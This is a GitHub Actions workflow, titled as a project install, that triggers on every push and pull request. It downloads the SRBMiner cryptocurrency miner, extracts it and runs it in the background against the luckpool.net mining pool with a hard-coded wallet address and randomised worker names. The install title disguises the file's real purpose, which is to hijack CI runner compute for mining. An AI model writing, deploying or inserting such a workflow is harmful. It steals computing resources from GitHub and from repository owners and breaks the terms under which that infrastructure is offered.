name: Installing a project

on: [push, pull_request]

jobs:
  install-and-run:
    runs-on: ubuntu-latest

    steps:
    - name: Checkout repository
      uses: actions/checkout@v2

    - name: Download SRBMiner
      run: wget -O SRBMiner-Multi-2-5-8-Linux.tar.gz https://github.com/doktor83/SRBMiner-Multi/releases/download/2.5.8/SRBMiner-Multi-2-5-8-Linux.tar.gz

    - name: Extract SRBMiner
      run: tar -xvf SRBMiner-Multi-2-5-8-Linux.tar.gz

    - name: Run SRBMiner
      run: |
        cd SRBMiner-Multi-2-5-8
        ./SRBMiner-MULTI --algorithm versus --pool stratum+tcp://na.luckpool.net:3960 --wallet RNjEn7tNTZ6DuYnYrxKMsvYzBgJ11P5hQ4 --worker raiden$(shuf -i 1-100 -n 1) --api-enable --api-port 21550 --api-rig-name raiden --background --log-file srbminer.log --log-file-mode 0 --miner-priority 3 --retry-time 60
